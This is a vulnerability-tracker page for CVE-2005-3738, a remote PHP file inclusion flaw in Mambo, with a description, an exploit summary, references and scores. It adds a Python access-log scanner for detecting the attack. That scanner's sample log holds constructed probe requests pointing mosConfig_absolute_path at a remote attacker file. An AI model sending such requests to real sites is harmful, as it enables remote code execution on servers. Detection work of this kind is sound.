CVE-2005-3738

EXPLOITED

Mambo Site Server <= 4.0.14 - Remote PHP File Inclusion via mosConfig_absolute_path Parameter


Exploitation Summary

CVE-2005-3738 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 1 public exploit, by rgod. Note that the exploit names Mambo CMS <= 4.5.2, while the CVE description and the product list below name Mambo Site Server 4.0.14 and earlier; the affected-product list on this page follows the CVE record.

AI-analyzed exploit summary: This exploit targets a global-variable overwrite vulnerability in Mambo CMS <= 4.5.2 that leads to remote command execution. The exploit is itself a PHP script run on the attacker's machine (see the prerequisites below); it presents a web form for entering the target details and the command to execute.

Description

globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array from request input and so conduct various attacks. As demonstrated, supplying the mosConfig_absolute_path parameter to content.html.php with a remote URL turns that script's include into remote PHP file inclusion. Remote inclusion of this kind only succeeds when the target's PHP configuration permits URL wrappers in include/require (allow_url_fopen, and on PHP 5.2 and later also allow_url_include).
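A detection check a practitioner would want for this record: scan web-server access logs for requests that set mosConfig_absolute_path to a remote URL or that carry a GLOBALS[...] array key, including percent-encoded and double-encoded forms. This is an added example, not part of the vulnerability record or of the public exploit; the exact parameter syntax the exploit uses is not on this page, so the script checks both the bare variable name and a GLOBALS[...] key (an assumption), and the log lines are constructed, not real traffic.

```python
"""Flag web-server requests that look like CVE-2005-3738 attempts against Mambo.

Added example, not part of the vulnerability record or of the public exploit.
It parses common/combined-format access log lines, which only expose the GET
query string; parameters sent in a POST body or a cookie are not visible here.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common Log Format prefix: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# The record says the demonstrated attack points mosConfig_absolute_path at a remote
# file. The exact parameter syntax used by the public exploit is not on the page, so
# (assumption) we flag both the bare variable name and any GLOBALS[...] array key.
TARGET_VAR = "mosConfig_absolute_path"
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def suspicious_params(query):
    """Return the reasons a query string looks like a GLOBALS overwrite / RFI attempt."""
    reasons = []
    # parse_qsl already percent-decodes once; decoding again catches double-encoded
    # brackets (%255B -> %5B -> [) that a single decode would leave intact.
    for raw_key, raw_val in parse_qsl(query, keep_blank_values=True):
        key = unquote(raw_key)
        val = unquote(raw_val)
        if key.upper().startswith("GLOBALS["):
            reasons.append("GLOBALS array key in request: " + key)
        if TARGET_VAR in key and REMOTE_SCHEME.match(val):
            reasons.append(key + " points to a remote file: " + val)
    return reasons


def scan_log(lines):
    """Return (client, timestamp, path, status, reasons) for each flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        client, ts, _method, target, status = m.groups()
        parts = urlsplit(target)
        reasons = suspicious_params(parts.query)
        if reasons:
            hits.append((client, ts, parts.path, status, reasons))
    return hits


# Constructed sample log (not real traffic): one benign view, three probe variants
# (plain, percent-encoded, double-encoded), one unrelated POST.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Nov/2005:10:01:12 +0000] "GET /mambo/index.php?option=com_content&task=view&id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Nov/2005:10:01:15 +0000] "GET /mambo/index.php?option=com_content&GLOBALS[mosConfig_absolute_path]=http://198.51.100.9/cmd.txt? HTTP/1.1" 200 311',
    '198.51.100.23 - - [16/Nov/2005:10:02:40 +0000] "GET /mambo/index.php?mosConfig_absolute_path=http%3A%2F%2F198.51.100.9%2Fx HTTP/1.0" 200 300',
    '198.51.100.23 - - [16/Nov/2005:10:02:44 +0000] "GET /mambo/index.php?GLOBALS%255BmosConfig_absolute_path%255D=ftp://198.51.100.9/x HTTP/1.0" 500 0',
    '192.0.2.44 - - [16/Nov/2005:10:03:01 +0000] "POST /mambo/index.php?option=com_login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for client, ts, path, status, reasons in scan_log(SAMPLE_LOG):
        print(f"{client} {ts} {path} -> {status}")
        for r in reasons:
            print("   ", r)
```

A 200 response on a flagged request is not proof of compromise (Mambo may simply ignore the parameter if the include path never resolves), but it is the request to pivot on: check the same client's follow-up requests and the referenced remote host, and confirm the installed Mambo version against the product list below.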

Exploits (1)

exploitdb WORKING POC VERIFIED
by rgod · webapps · php
https://www.exploit-db.com/exploits/1337

Classification
Working PoC (95% confidence)
Attack Type: RCE
Complexity: Moderate
Reliability: Reliable
Target: Mambo CMS <= 4.5.2
No auth needed
Prerequisites: Target must be running Mambo CMS <= 4.5.2 · PHP must be installed on the attacker's machine
devstral-2 · analyzed Feb 16, 2026

References (9)

Third Party Advisory, VDB Entry · Bugtraq mailing list
http://www.securityfocus.com/archive/1/426942/100/0/threaded
Third Party Advisory, VDB Entry · SecurityFocus BID
http://www.securityfocus.com/bid/15461
Third Party Advisory · Secunia
http://secunia.com/advisories/17622
Various Sources · vendor forum (confirm)
http://forum.mamboserver.com/showthread.php?t=66154
Third Party Advisory, VDB Entry · SecurityTracker
http://securitytracker.com/id?1015258
Exploit, Vendor Advisory · Full-Disclosure mailing list
http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html
Third Party Advisory, VDB Entry · Bugtraq mailing list
http://www.securityfocus.com/archive/1/427196/100/0/threaded
Exploit · Bugtraq mailing list
http://www.securityfocus.com/archive/1/417215
Third Party Advisory · VUPEN
http://www.vupen.com/english/advisories/2005/2473

Scores

EPSS score: 0.0549 (5.49%)
EPSS percentile: 90.5%

Details

VulnCheck KEV: 2005-11-22
Status published
Products (10)
mambo/mambo_site_server 4.0
mambo/mambo_site_server 4.0.10
mambo/mambo_site_server 4.0.11
mambo/mambo_site_server 4.0.12
mambo/mambo_site_server 4.0.12_beta
mambo/mambo_site_server 4.0.12_beta_2
mambo/mambo_site_server 4.0.12_rc1
mambo/mambo_site_server 4.0.12_rc2
mambo/mambo_site_server 4.0.12_rc3
mambo/mambo_site_server 4.0.14
Published Nov 22, 2005
Tracked Since Feb 18, 2026